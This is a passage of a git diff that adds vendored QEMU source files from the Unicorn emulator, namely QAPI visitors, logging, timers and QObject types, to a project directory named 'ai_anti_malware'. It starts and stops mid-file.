v->type_number(v, obj, name, errp); +} + +void output_type_enum(Visitor *v, int *obj, const char *strings[], + const char *kind, const char *name, + Error **errp) +{ + int i = 0; + int value = *obj; + char *enum_str; + + assert(strings); + while (strings[i++] != 
NULL); + if (value < 0 || value >= i - 1) { + error_set(errp, QERR_INVALID_PARAMETER, name ? name : "null"); + return; + } + + enum_str = (char *)strings[value]; + visit_type_str(v, &enum_str, name, errp); +} + +void input_type_enum(Visitor *v, int *obj, const char *strings[], + const char *kind, const char *name, + Error **errp) +{ + Error *local_err = NULL; + int64_t value = 0; + char *enum_str; + + assert(strings); + + visit_type_str(v, &enum_str, name, &local_err); + if (local_err) { + error_propagate(errp, local_err); + return; + } + + while (strings[value] != NULL) { + if (strcmp(strings[value], enum_str) == 0) { + break; + } + value++; + } + + if (strings[value] == NULL) { + error_set(errp, QERR_INVALID_PARAMETER, enum_str); + g_free(enum_str); + return; + } + + g_free(enum_str); + *obj = (int)value; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/qapi/qmp-input-visitor.c b/ai_anti_malware/unicorn/unicorn-master/qemu/qapi/qmp-input-visitor.c new file mode 100644 index 0000000..33dd754 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/qapi/qmp-input-visitor.c @@ -0,0 +1,349 @@ +/* + * Input Visitor + * + * Copyright IBM, Corp. 2011 + * + * Authors: + * Anthony Liguori + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. 
+ * + */ + +#include "qapi/qmp-input-visitor.h" +#include "qapi/visitor-impl.h" +#include "qemu/queue.h" +#include "qemu-common.h" +#include "qapi/qmp/types.h" +#include "qapi/qmp/qerror.h" + +#define QIV_STACK_SIZE 1024 + +typedef struct StackObject +{ + QObject *obj; + const QListEntry *entry; + GHashTable *h; +} StackObject; + +struct QmpInputVisitor +{ + Visitor visitor; + StackObject stack[QIV_STACK_SIZE]; + int nb_stack; + bool strict; +}; + +static QmpInputVisitor *to_qiv(Visitor *v) +{ + return container_of(v, QmpInputVisitor, visitor); +} + +static QObject *qmp_input_get_object(QmpInputVisitor *qiv, + const char *name, + bool consume) +{ + QObject *qobj = qiv->stack[qiv->nb_stack - 1].obj; + + if (qobj) { + if (name && qobject_type(qobj) == QTYPE_QDICT) { + if (qiv->stack[qiv->nb_stack - 1].h && consume) { + g_hash_table_remove(qiv->stack[qiv->nb_stack - 1].h, name); + } + return qdict_get(qobject_to_qdict(qobj), name); + } else if (qiv->stack[qiv->nb_stack - 1].entry) { + return qlist_entry_obj(qiv->stack[qiv->nb_stack - 1].entry); + } + } + + return qobj; +} + +static void qdict_add_key(const char *key, QObject *obj, void *opaque) +{ + GHashTable *h = opaque; + g_hash_table_insert(h, (gpointer) key, NULL); +} + +static void qmp_input_push(QmpInputVisitor *qiv, QObject *obj, Error **errp) +{ + GHashTable *h; + + if (qiv->nb_stack >= QIV_STACK_SIZE) { + error_setg(errp, "An internal buffer overran"); + return; + } + + qiv->stack[qiv->nb_stack].obj = obj; + qiv->stack[qiv->nb_stack].entry = NULL; + qiv->stack[qiv->nb_stack].h = NULL; + + if (qiv->strict && qobject_type(obj) == QTYPE_QDICT) { + h = g_hash_table_new(g_str_hash, g_str_equal); + qdict_iter(qobject_to_qdict(obj), qdict_add_key, h); + qiv->stack[qiv->nb_stack].h = h; + } + + qiv->nb_stack++; +} + +/** Only for qmp_input_pop. 
*/ +static gboolean always_true(gpointer key, gpointer val, gpointer user_pkey) +{ + *(const char **)user_pkey = (const char *)key; + return TRUE; +} + +static void qmp_input_pop(QmpInputVisitor *qiv, Error **errp) +{ + assert(qiv->nb_stack > 0); + + if (qiv->strict) { + GHashTable * const top_ht = qiv->stack[qiv->nb_stack - 1].h; + if (top_ht) { + if (g_hash_table_size(top_ht)) { + const char *key; + g_hash_table_find(top_ht, always_true, (gpointer)&key); + error_set(errp, QERR_QMP_EXTRA_MEMBER, key); + } + g_hash_table_unref(top_ht); + } + } + + qiv->nb_stack--; +} + +static void qmp_input_start_struct(Visitor *v, void **obj, const char *kind, + const char *name, size_t size, Error **errp) +{ + QmpInputVisitor *qiv = to_qiv(v); + QObject *qobj = qmp_input_get_object(qiv, name, true); + Error *err = NULL; + + if (!qobj || qobject_type(qobj) != QTYPE_QDICT) { + error_set(errp, QERR_INVALID_PARAMETER_TYPE, name ? name : "null", + "QDict"); + return; + } + + qmp_input_push(qiv, qobj, &err); + if (err) { + error_propagate(errp, err); + return; + } + + if (obj) { + *obj = g_malloc0(size); + } +} + +static void qmp_input_end_struct(Visitor *v, Error **errp) +{ + QmpInputVisitor *qiv = to_qiv(v); + + qmp_input_pop(qiv, errp); +} + +static void qmp_input_start_implicit_struct(Visitor *v, void **obj, + size_t size, Error **errp) +{ + if (obj) { + *obj = g_malloc0(size); + } +} + +static void qmp_input_end_implicit_struct(Visitor *v, Error **errp) +{ +} + +static void qmp_input_start_list(Visitor *v, const char *name, Error **errp) +{ + QmpInputVisitor *qiv = to_qiv(v); + QObject *qobj = qmp_input_get_object(qiv, name, true); + + if (!qobj || qobject_type(qobj) != QTYPE_QLIST) { + error_set(errp, QERR_INVALID_PARAMETER_TYPE, name ? 
name : "null", + "list"); + return; + } + + qmp_input_push(qiv, qobj, errp); +} + +static GenericList *qmp_input_next_list(Visitor *v, GenericList **list, + Error **errp) +{ + QmpInputVisitor *qiv = to_qiv(v); + GenericList *entry; + StackObject *so = &qiv->stack[qiv->nb_stack - 1]; + bool first; + + if (so->entry == NULL) { + so->entry = qlist_first(qobject_to_qlist(so->obj)); + first = true; + } else { + so->entry = qlist_next(so->entry); + first = false; + } + + if (so->entry == NULL) { + return NULL; + } + + entry = g_malloc0(sizeof(*entry)); + if (first) { + *list = entry; + } else { + (*list)->next = entry; + } + + return entry; +} + +static void qmp_input_end_list(Visitor *v, Error **errp) +{ + QmpInputVisitor *qiv = to_qiv(v); + + qmp_input_pop(qiv, errp); +} + +static void qmp_input_get_next_type(Visitor *v, int *kind, const int *qobjects, + const char *name, Error **errp) +{ + QmpInputVisitor *qiv = to_qiv(v); + QObject *qobj = qmp_input_get_object(qiv, name, false); + + if (!qobj) { + error_set(errp, QERR_MISSING_PARAMETER, name ? name : "null"); + return; + } + *kind = qobjects[qobject_type(qobj)]; +} + +static void qmp_input_type_int(Visitor *v, int64_t *obj, const char *name, + Error **errp) +{ + QmpInputVisitor *qiv = to_qiv(v); + QObject *qobj = qmp_input_get_object(qiv, name, true); + + if (!qobj || qobject_type(qobj) != QTYPE_QINT) { + error_set(errp, QERR_INVALID_PARAMETER_TYPE, name ? name : "null", + "integer"); + return; + } + + *obj = qint_get_int(qobject_to_qint(qobj)); +} + +static void qmp_input_type_bool(Visitor *v, bool *obj, const char *name, + Error **errp) +{ + QmpInputVisitor *qiv = to_qiv(v); + QObject *qobj = qmp_input_get_object(qiv, name, true); + + if (!qobj || qobject_type(qobj) != QTYPE_QBOOL) { + error_set(errp, QERR_INVALID_PARAMETER_TYPE, name ? 
name : "null", + "boolean"); + return; + } + + *obj = qbool_get_int(qobject_to_qbool(qobj)); +} + +static void qmp_input_type_str(Visitor *v, char **obj, const char *name, + Error **errp) +{ + QmpInputVisitor *qiv = to_qiv(v); + QObject *qobj = qmp_input_get_object(qiv, name, true); + + if (!qobj || qobject_type(qobj) != QTYPE_QSTRING) { + error_set(errp, QERR_INVALID_PARAMETER_TYPE, name ? name : "null", + "string"); + return; + } + + *obj = g_strdup(qstring_get_str(qobject_to_qstring(qobj))); +} + +static void qmp_input_type_number(Visitor *v, double *obj, const char *name, + Error **errp) +{ + QmpInputVisitor *qiv = to_qiv(v); + QObject *qobj = qmp_input_get_object(qiv, name, true); + + if (!qobj || (qobject_type(qobj) != QTYPE_QFLOAT && + qobject_type(qobj) != QTYPE_QINT)) { + error_set(errp, QERR_INVALID_PARAMETER_TYPE, name ? name : "null", + "number"); + return; + } + + if (qobject_type(qobj) == QTYPE_QINT) { + *obj = (double)qint_get_int(qobject_to_qint(qobj)); + } else { + *obj = qfloat_get_double(qobject_to_qfloat(qobj)); + } +} + +static void qmp_input_optional(Visitor *v, bool *present, const char *name, + Error **errp) +{ + QmpInputVisitor *qiv = to_qiv(v); + QObject *qobj = qmp_input_get_object(qiv, name, true); + + if (!qobj) { + *present = false; + return; + } + + *present = true; +} + +Visitor *qmp_input_get_visitor(QmpInputVisitor *v) +{ + return &v->visitor; +} + +void qmp_input_visitor_cleanup(QmpInputVisitor *v) +{ + qobject_decref(v->stack[0].obj); + g_free(v); +} + +QmpInputVisitor *qmp_input_visitor_new(QObject *obj) +{ + QmpInputVisitor *v; + + v = g_malloc0(sizeof(*v)); + + v->visitor.start_struct = qmp_input_start_struct; + v->visitor.end_struct = qmp_input_end_struct; + v->visitor.start_implicit_struct = qmp_input_start_implicit_struct; + v->visitor.end_implicit_struct = qmp_input_end_implicit_struct; + v->visitor.start_list = qmp_input_start_list; + v->visitor.next_list = qmp_input_next_list; + v->visitor.end_list = qmp_input_end_list; 
+ v->visitor.type_enum = input_type_enum; + v->visitor.type_int = qmp_input_type_int; + v->visitor.type_bool = qmp_input_type_bool; + v->visitor.type_str = qmp_input_type_str; + v->visitor.type_number = qmp_input_type_number; + v->visitor.optional = qmp_input_optional; + v->visitor.get_next_type = qmp_input_get_next_type; + + qmp_input_push(v, obj, NULL); + qobject_incref(obj); + + return v; +} + +QmpInputVisitor *qmp_input_visitor_new_strict(QObject *obj) +{ + QmpInputVisitor *v; + + v = qmp_input_visitor_new(obj); + v->strict = true; + + return v; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/qapi/qmp-output-visitor.c b/ai_anti_malware/unicorn/unicorn-master/qemu/qapi/qmp-output-visitor.c new file mode 100644 index 0000000..96b3384 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/qapi/qmp-output-visitor.c @@ -0,0 +1,241 @@ +/* + * Core Definitions for QAPI/QMP Command Registry + * + * Copyright IBM, Corp. 2011 + * + * Authors: + * Anthony Liguori + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. 
+ * + */ + +#include "qapi/qmp-output-visitor.h" +#include "qapi/visitor-impl.h" +#include "qemu/queue.h" +#include "qemu-common.h" +#include "qapi/qmp/types.h" +#include "qapi/qmp/qerror.h" + +typedef struct QStackEntry +{ + QObject *value; + bool is_list_head; + QTAILQ_ENTRY(QStackEntry) node; +} QStackEntry; + +typedef QTAILQ_HEAD(QStack, QStackEntry) QStack; + +struct QmpOutputVisitor +{ + Visitor visitor; + QStack stack; +}; + +#define qmp_output_add(qov, name, value) \ + qmp_output_add_obj(qov, name, QOBJECT(value)) +#define qmp_output_push(qov, value) qmp_output_push_obj(qov, QOBJECT(value)) + +static QmpOutputVisitor *to_qov(Visitor *v) +{ + return container_of(v, QmpOutputVisitor, visitor); +} + +static void qmp_output_push_obj(QmpOutputVisitor *qov, QObject *value) +{ + QStackEntry *e = g_malloc0(sizeof(*e)); + + e->value = value; + if (qobject_type(e->value) == QTYPE_QLIST) { + e->is_list_head = true; + } + QTAILQ_INSERT_HEAD(&qov->stack, e, node); +} + +static QObject *qmp_output_pop(QmpOutputVisitor *qov) +{ + QStackEntry *e = QTAILQ_FIRST(&qov->stack); + QObject *value; + QTAILQ_REMOVE(&qov->stack, e, node); + value = e->value; + g_free(e); + return value; +} + +static QObject *qmp_output_first(QmpOutputVisitor *qov) +{ + QStackEntry *e = QTAILQ_LAST(&qov->stack, QStack); + + /* FIXME - find a better way to deal with NULL values */ + if (!e) { + return NULL; + } + + return e->value; +} + +static QObject *qmp_output_last(QmpOutputVisitor *qov) +{ + QStackEntry *e = QTAILQ_FIRST(&qov->stack); + return e->value; +} + +static void qmp_output_add_obj(QmpOutputVisitor *qov, const char *name, + QObject *value) +{ + QObject *cur; + + if (QTAILQ_EMPTY(&qov->stack)) { + qmp_output_push_obj(qov, value); + return; + } + + cur = qmp_output_last(qov); + + switch (qobject_type(cur)) { + case QTYPE_QDICT: + qdict_put_obj(qobject_to_qdict(cur), name, value); + break; + case QTYPE_QLIST: + qlist_append_obj(qobject_to_qlist(cur), value); + break; + default: + 
qobject_decref(qmp_output_pop(qov)); + qmp_output_push_obj(qov, value); + break; + } +} + +static void qmp_output_start_struct(Visitor *v, void **obj, const char *kind, + const char *name, size_t unused, + Error **errp) +{ + QmpOutputVisitor *qov = to_qov(v); + QDict *dict = qdict_new(); + + qmp_output_add(qov, name, dict); + qmp_output_push(qov, dict); +} + +static void qmp_output_end_struct(Visitor *v, Error **errp) +{ + QmpOutputVisitor *qov = to_qov(v); + qmp_output_pop(qov); +} + +static void qmp_output_start_list(Visitor *v, const char *name, Error **errp) +{ + QmpOutputVisitor *qov = to_qov(v); + QList *list = qlist_new(); + + qmp_output_add(qov, name, list); + qmp_output_push(qov, list); +} + +static GenericList *qmp_output_next_list(Visitor *v, GenericList **listp, + Error **errp) +{ + GenericList *list = *listp; + QmpOutputVisitor *qov = to_qov(v); + QStackEntry *e = QTAILQ_FIRST(&qov->stack); + + assert(e); + if (e->is_list_head) { + e->is_list_head = false; + return list; + } + + return list ? 
list->next : NULL; +} + +static void qmp_output_end_list(Visitor *v, Error **errp) +{ + QmpOutputVisitor *qov = to_qov(v); + qmp_output_pop(qov); +} + +static void qmp_output_type_int(Visitor *v, int64_t *obj, const char *name, + Error **errp) +{ + QmpOutputVisitor *qov = to_qov(v); + qmp_output_add(qov, name, qint_from_int(*obj)); +} + +static void qmp_output_type_bool(Visitor *v, bool *obj, const char *name, + Error **errp) +{ + QmpOutputVisitor *qov = to_qov(v); + qmp_output_add(qov, name, qbool_from_int(*obj)); +} + +static void qmp_output_type_str(Visitor *v, char **obj, const char *name, + Error **errp) +{ + QmpOutputVisitor *qov = to_qov(v); + if (*obj) { + qmp_output_add(qov, name, qstring_from_str(*obj)); + } else { + qmp_output_add(qov, name, qstring_from_str("")); + } +} + +static void qmp_output_type_number(Visitor *v, double *obj, const char *name, + Error **errp) +{ + QmpOutputVisitor *qov = to_qov(v); + qmp_output_add(qov, name, qfloat_from_double(*obj)); +} + +QObject *qmp_output_get_qobject(QmpOutputVisitor *qov) +{ + QObject *obj = qmp_output_first(qov); + if (obj) { + qobject_incref(obj); + } + return obj; +} + +Visitor *qmp_output_get_visitor(QmpOutputVisitor *v) +{ + return &v->visitor; +} + +void qmp_output_visitor_cleanup(QmpOutputVisitor *v) +{ + QStackEntry *e, *tmp; + + /* The bottom QStackEntry, if any, owns the root QObject. See the + * qmp_output_push_obj() invocations in qmp_output_add_obj(). */ + QObject *root = QTAILQ_EMPTY(&v->stack) ? 
NULL : qmp_output_first(v); + + QTAILQ_FOREACH_SAFE(e, &v->stack, node, tmp) { + QTAILQ_REMOVE(&v->stack, e, node); + g_free(e); + } + + qobject_decref(root); + g_free(v); +} + +QmpOutputVisitor *qmp_output_visitor_new(void) +{ + QmpOutputVisitor *v; + + v = g_malloc0(sizeof(*v)); + + v->visitor.start_struct = qmp_output_start_struct; + v->visitor.end_struct = qmp_output_end_struct; + v->visitor.start_list = qmp_output_start_list; + v->visitor.next_list = qmp_output_next_list; + v->visitor.end_list = qmp_output_end_list; + v->visitor.type_enum = output_type_enum; + v->visitor.type_int = qmp_output_type_int; + v->visitor.type_bool = qmp_output_type_bool; + v->visitor.type_str = qmp_output_type_str; + v->visitor.type_number = qmp_output_type_number; + + QTAILQ_INIT(&v->stack); + + return v; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/qapi/string-input-visitor.c b/ai_anti_malware/unicorn/unicorn-master/qemu/qapi/string-input-visitor.c new file mode 100644 index 0000000..cc5826e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/qapi/string-input-visitor.c @@ -0,0 +1,325 @@ +/* + * String parsing visitor + * + * Copyright Red Hat, Inc. 2012 + * + * Author: Paolo Bonzini + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. 
+ * + */ + +#include "qemu-common.h" +#include "qapi/string-input-visitor.h" +#include "qapi/visitor-impl.h" +#include "qapi/qmp/qerror.h" +#include "qemu/queue.h" +#include "qemu/range.h" +#include <stdlib.h> // strtoll + + +struct StringInputVisitor +{ + Visitor visitor; + + bool head; + + GList *ranges; + GList *cur_range; + int64_t cur; + + const char *string; +}; + +static void free_range(void *range, void *dummy) +{ + g_free(range); +} + +static void parse_str(StringInputVisitor *siv, Error **errp) +{ + char *str = (char *) siv->string; + long long start, end; + Range *cur; + char *endptr; + + if (siv->ranges) { + return; + } + + do { + errno = 0; + start = strtoll(str, &endptr, 0); + if (errno == 0 && endptr > str) { + if (*endptr == '\0') { + cur = g_malloc0(sizeof(*cur)); + cur->begin = start; + cur->end = start + 1; + siv->ranges = g_list_insert_sorted_merged(siv->ranges, cur, + range_compare); + cur = NULL; + str = NULL; + } else if (*endptr == '-') { + str = endptr + 1; + errno = 0; + end = strtoll(str, &endptr, 0); + if (errno == 0 && endptr > str && start <= end && + (start > INT64_MAX - 65536 || + end < start + 65536)) { + if (*endptr == '\0') { + cur = g_malloc0(sizeof(*cur)); + cur->begin = start; + cur->end = end + 1; + siv->ranges = + g_list_insert_sorted_merged(siv->ranges, + cur, + range_compare); + cur = NULL; + str = NULL; + } else if (*endptr == ',') { + str = endptr + 1; + cur = g_malloc0(sizeof(*cur)); + cur->begin = start; + cur->end = end + 1; + siv->ranges = + g_list_insert_sorted_merged(siv->ranges, + cur, + range_compare); + cur = NULL; + } else { + goto error; + } + } else { + goto error; + } + } else if (*endptr == ',') { + str = endptr + 1; + cur = g_malloc0(sizeof(*cur)); + cur->begin = start; + cur->end = start + 1; + siv->ranges = g_list_insert_sorted_merged(siv->ranges, + cur, + range_compare); + cur = NULL; + } else { + goto error; + } + } else { + goto error; + } + } while (str); + + return; +error: + g_list_foreach(siv->ranges, 
free_range, NULL); + g_list_free(siv->ranges); + siv->ranges = NULL; +} + +static void +start_list(Visitor *v, const char *name, Error **errp) +{ + StringInputVisitor *siv = DO_UPCAST(StringInputVisitor, visitor, v); + + parse_str(siv, errp); + + siv->cur_range = g_list_first(siv->ranges); + if (siv->cur_range) { + Range *r = siv->cur_range->data; + if (r) { + siv->cur = r->begin; + } + } +} + +static GenericList * +next_list(Visitor *v, GenericList **list, Error **errp) +{ + StringInputVisitor *siv = DO_UPCAST(StringInputVisitor, visitor, v); + GenericList **link; + Range *r; + + if (!siv->ranges || !siv->cur_range) { + return NULL; + } + + r = siv->cur_range->data; + if (!r) { + return NULL; + } + + if ((uint64_t)siv->cur < r->begin || (uint64_t)siv->cur >= r->end) { + siv->cur_range = g_list_next(siv->cur_range); + if (!siv->cur_range) { + return NULL; + } + r = siv->cur_range->data; + if (!r) { + return NULL; + } + siv->cur = r->begin; + } + + if (siv->head) { + link = list; + siv->head = false; + } else { + link = &(*list)->next; + } + + *link = g_malloc0(sizeof **link); + return *link; +} + +static void +end_list(Visitor *v, Error **errp) +{ + StringInputVisitor *siv = DO_UPCAST(StringInputVisitor, visitor, v); + siv->head = true; +} + +static void parse_type_int(Visitor *v, int64_t *obj, const char *name, + Error **errp) +{ + StringInputVisitor *siv = DO_UPCAST(StringInputVisitor, visitor, v); + + if (!siv->string) { + error_set(errp, QERR_INVALID_PARAMETER_TYPE, name ? 
name : "null", + "integer"); + return; + } + + parse_str(siv, errp); + + if (!siv->ranges) { + goto error; + } + + if (!siv->cur_range) { + Range *r; + + siv->cur_range = g_list_first(siv->ranges); + if (!siv->cur_range) { + goto error; + } + + r = siv->cur_range->data; + if (!r) { + goto error; + } + + siv->cur = r->begin; + } + + *obj = siv->cur; + siv->cur++; + return; + +error: + error_set(errp, QERR_INVALID_PARAMETER_VALUE, name, + "an int64 value or range"); +} + +static void parse_type_bool(Visitor *v, bool *obj, const char *name, + Error **errp) +{ + StringInputVisitor *siv = DO_UPCAST(StringInputVisitor, visitor, v); + + if (siv->string) { + if (!strcasecmp(siv->string, "on") || + !strcasecmp(siv->string, "yes") || + !strcasecmp(siv->string, "true")) { + *obj = true; + return; + } + if (!strcasecmp(siv->string, "off") || + !strcasecmp(siv->string, "no") || + !strcasecmp(siv->string, "false")) { + *obj = false; + return; + } + } + + error_set(errp, QERR_INVALID_PARAMETER_TYPE, name ? name : "null", + "boolean"); +} + +static void parse_type_str(Visitor *v, char **obj, const char *name, + Error **errp) +{ + StringInputVisitor *siv = DO_UPCAST(StringInputVisitor, visitor, v); + if (siv->string) { + *obj = g_strdup(siv->string); + } else { + error_set(errp, QERR_INVALID_PARAMETER_TYPE, name ? name : "null", + "string"); + } +} + +static void parse_type_number(Visitor *v, double *obj, const char *name, + Error **errp) +{ + StringInputVisitor *siv = DO_UPCAST(StringInputVisitor, visitor, v); + char *endp = (char *) siv->string; + double val; + + errno = 0; + if (siv->string) { + val = strtod(siv->string, &endp); + } + if (!siv->string || errno || endp == siv->string || *endp) { + error_set(errp, QERR_INVALID_PARAMETER_TYPE, name ? 
name : "null", + "number"); + return; + } + + *obj = val; +} + +static void parse_optional(Visitor *v, bool *present, const char *name, + Error **errp) +{ + StringInputVisitor *siv = DO_UPCAST(StringInputVisitor, visitor, v); + + if (!siv->string) { + *present = false; + return; + } + + *present = true; +} + +Visitor *string_input_get_visitor(StringInputVisitor *v) +{ + return &v->visitor; +} + +void string_input_visitor_cleanup(StringInputVisitor *v) +{ + g_list_foreach(v->ranges, free_range, NULL); + g_list_free(v->ranges); + g_free(v); +} + +StringInputVisitor *string_input_visitor_new(const char *str) +{ + StringInputVisitor *v; + + v = g_malloc0(sizeof(*v)); + + v->visitor.type_enum = input_type_enum; + v->visitor.type_int = parse_type_int; + v->visitor.type_size = NULL; + v->visitor.type_bool = parse_type_bool; + v->visitor.type_str = parse_type_str; + v->visitor.type_number = parse_type_number; + v->visitor.start_list = start_list; + v->visitor.next_list = next_list; + v->visitor.end_list = end_list; + v->visitor.optional = parse_optional; + + v->string = str; + v->head = true; + return v; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/qemu-log.c b/ai_anti_malware/unicorn/unicorn-master/qemu/qemu-log.c new file mode 100644 index 0000000..6198eb6 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/qemu-log.c @@ -0,0 +1,47 @@ +/* + * Logging support + * + * Copyright (c) 2003 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. 
+ * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see <http://www.gnu.org/licenses/>. + */ + +#include "qemu-common.h" +#include "qemu/log.h" + +FILE *qemu_logfile; +int qemu_loglevel; + +void qemu_log(const char *fmt, ...) +{ + va_list ap; + + va_start(ap, fmt); + if (qemu_logfile) { + vfprintf(qemu_logfile, fmt, ap); + } + va_end(ap); +} + +void qemu_log_mask(int mask, const char *fmt, ...) +{ + va_list ap; + + va_start(ap, fmt); + if ((qemu_loglevel & mask) && qemu_logfile) { + vfprintf(qemu_logfile, fmt, ap); + } + va_end(ap); +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/qemu-timer.c b/ai_anti_malware/unicorn/unicorn-master/qemu/qemu-timer.c new file mode 100644 index 0000000..28e5121 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/qemu-timer.c @@ -0,0 +1,103 @@ +/* + * QEMU System Emulator + * + * Copyright (c) 2003-2008 Fabrice Bellard + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ + +/* Modified for Unicorn Engine by Nguyen Anh Quynh, 2015 */ + +#include "sysemu/sysemu.h" + +#include "hw/hw.h" + +#include "qemu/timer.h" + +#ifdef CONFIG_PPOLL +#include <poll.h> +#endif + +#ifdef CONFIG_PRCTL_PR_SET_TIMERSLACK +#include <sys/prctl.h> +#endif + +#include "uc_priv.h" + +/***********************************************************/ +/* timers */ + +typedef struct QEMUClock { + /* We rely on BQL to protect the timerlists */ + QLIST_HEAD(, QEMUTimerList) timerlists; + + int64_t last; + + QEMUClockType type; + bool enabled; +} QEMUClock; + +static QEMUClock qemu_clocks[QEMU_CLOCK_MAX]; + +/** + * qemu_clock_ptr: + * @type: type of clock + * + * Translate a clock type into a pointer to QEMUClock object. + * + * Returns: a pointer to the QEMUClock object + */ +static inline QEMUClock *qemu_clock_ptr(QEMUClockType type) +{ + return &qemu_clocks[type]; +} + +/* return the host CPU cycle counter and handle stop/restart */ +int64_t cpu_get_ticks(void) +{ + return cpu_get_real_ticks(); +} + +/* return the host CPU monotonic timer and handle stop/restart */ +int64_t cpu_get_clock(void) +{ + return get_clock(); +} + +int64_t qemu_clock_get_ns(QEMUClockType type) +{ + int64_t now, last; + QEMUClock *clock = qemu_clock_ptr(type); + + switch (type) { + case QEMU_CLOCK_REALTIME: + return get_clock(); + default: + case QEMU_CLOCK_VIRTUAL: + return cpu_get_clock(); + case QEMU_CLOCK_HOST: + now = get_clock_realtime(); + last = clock->last; + clock->last = now; + if (now < last) { + // notifier_list_notify(&clock->reset_notifiers, &now); // FIXME + } + return now; + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/qobject/Makefile.objs 
b/ai_anti_malware/unicorn/unicorn-master/qemu/qobject/Makefile.objs new file mode 100644 index 0000000..8d85254 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/qobject/Makefile.objs @@ -0,0 +1,2 @@ +util-obj-y = qint.o qstring.o qdict.o qlist.o qfloat.o qbool.o +util-obj-y += qerror.o diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/qobject/qbool.c b/ai_anti_malware/unicorn/unicorn-master/qemu/qobject/qbool.c new file mode 100644 index 0000000..df4a23b --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/qobject/qbool.c @@ -0,0 +1,68 @@ +/* + * QBool Module + * + * Copyright IBM, Corp. 2009 + * + * Authors: + * Anthony Liguori + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + * + */ + +#include "qapi/qmp/qbool.h" +#include "qapi/qmp/qobject.h" +#include "qemu-common.h" + +static void qbool_destroy_obj(QObject *obj); + +static const QType qbool_type = { + QTYPE_QBOOL, + qbool_destroy_obj, +}; + +/** + * qbool_from_int(): Create a new QBool from an int + * + * Return strong reference. 
+ */ +QBool *qbool_from_int(int value) +{ + QBool *qb; + + qb = g_malloc(sizeof(*qb)); + qb->value = value; + QOBJECT_INIT(qb, &qbool_type); + + return qb; +} + +/** + * qbool_get_int(): Get the stored int + */ +int qbool_get_int(const QBool *qb) +{ + return qb->value; +} + +/** + * qobject_to_qbool(): Convert a QObject into a QBool + */ +QBool *qobject_to_qbool(const QObject *obj) +{ + if (qobject_type(obj) != QTYPE_QBOOL) + return NULL; + + return container_of(obj, QBool, base); +} + +/** + * qbool_destroy_obj(): Free all memory allocated by a + * QBool object + */ +static void qbool_destroy_obj(QObject *obj) +{ + assert(obj != NULL); + g_free(qobject_to_qbool(obj)); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/qobject/qdict.c b/ai_anti_malware/unicorn/unicorn-master/qemu/qobject/qdict.c new file mode 100644 index 0000000..e1a96a4 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/qobject/qdict.c @@ -0,0 +1,699 @@ +/* + * QDict Module + * + * Copyright (C) 2009 Red Hat Inc. + * + * Authors: + * Luiz Capitulino + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + */ + +#include "qapi/qmp/qint.h" +#include "qapi/qmp/qfloat.h" +#include "qapi/qmp/qdict.h" +#include "qapi/qmp/qbool.h" +#include "qapi/qmp/qstring.h" +#include "qapi/qmp/qobject.h" +#include "qemu/queue.h" +#include "qemu-common.h" + +static void qdict_destroy_obj(QObject *obj); + +static const QType qdict_type = { + QTYPE_QDICT, + qdict_destroy_obj, +}; + +/** + * qdict_new(): Create a new QDict + * + * Return strong reference. 
